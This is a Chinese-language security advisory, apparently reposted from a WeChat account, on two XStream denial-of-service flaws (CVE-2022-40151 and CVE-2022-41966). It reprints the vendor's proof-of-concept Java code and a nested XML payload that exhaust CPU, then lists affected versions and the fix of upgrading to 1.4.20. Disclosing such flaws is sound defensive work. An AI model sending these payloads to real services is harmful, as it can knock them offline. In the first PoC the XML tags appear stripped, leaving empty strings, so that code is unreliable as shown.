XStream 拒绝服务漏洞(CVE-2022-40151/41966)

admin
admin
admin
138693
文章
114
评论
2023年1月9日22:39:23评论179 views字数 1321阅读4分24秒阅读模式

XStream 拒绝服务漏洞(CVE-2022-40151/41966)





XStream 多个拒绝服务漏洞及POC

CVE-2022-40151/41966




XStream 拒绝服务漏洞(CVE-2022-40151/41966)

XStream是Java类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。
日前,XStream官方通报XStream两个拒绝服务漏洞,分别为CVE-2022-40151和CVE-2022-41966,漏洞影响1.4.19及以前的XStream版本,漏洞等级高危。




XStream 拒绝服务漏洞(CVE-2022-40151/41966)





NO.1


漏洞描述


XStream 拒绝服务漏洞(CVE-2022-40151/41966)
XStream受影响版本在解析特定的字符串时,会造成拒绝服务。官方已经给出测试POC:
1、导入受影响的XStream版本:
    创建Maven项目,在pom.xml的dependencies中引入受影响的XStream版本。
<dependency>    <groupId>com.thoughtworks.xstream</groupId>    <artifactId>xstream</artifactId>    <version>1.4.18</version></dependency>
2、导入XStream并使用POC进行测试:
导入:
import com.thoughtworks.xstream.XStream;

CVE-2022-40151:
package org.example;
import com.thoughtworks.xstream.XStream;
public class Main {    public static void main(String[] args) {
        String xml = new String();        int i = 0;        for( ; i < 10000; ++i) {            xml += "";        }        for( ; i > 0; --i) {            xml += "";        }        XStream xstream = new XStream();        xstream.fromXML(xml);    }}
CVE-2022-41966:
替换待解析的字符串为
xml = "<set>n" +      "  <set>n" +      "    <set>n" +      "      <set>n" +      "        <set>n" +      "          <set>n" +      "            <set>n" +      "              <string>a</string>n" +      "            </set>n" +      "            <set>n" +      "              <string>b</string>n" +      "            </set>n" +      "          </set>n" +      "          <set>n" +      "            <string>c</string>n" +      "            <set reference='../../../set/set[2]'/>n" +      "          </set>n" +      "        </set>n" +      "      </set>n" +      "    </set>n" +      "  </set>n" +      "</set>";

运行后可看到CPU使用率的明显飙升。

XStream 拒绝服务漏洞(CVE-2022-40151/41966)




NO.2


漏洞影响范围


XStream 拒绝服务漏洞(CVE-2022-40151/41966)

XStream <= 1.4.19





NO.3


修复方案


XStream 拒绝服务漏洞(CVE-2022-40151/41966)
官方已发布XStream 1.4.20,请相关使用者及时更新XStream版本到1.4.20。





NO.4


参考链接


XStream 拒绝服务漏洞(CVE-2022-40151/41966)
http://x-stream.github.io/CVE-2022-40151.html
http://x-stream.github.io/CVE-2022-41966.html


XStream 拒绝服务漏洞(CVE-2022-40151/41966)


原文始发于微信公众号(锋刃科技):XStream 拒绝服务漏洞(CVE-2022-40151/41966)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月9日22:39:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XStream 拒绝服务漏洞(CVE-2022-40151/41966)https://cn-sec.com/archives/1506592.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息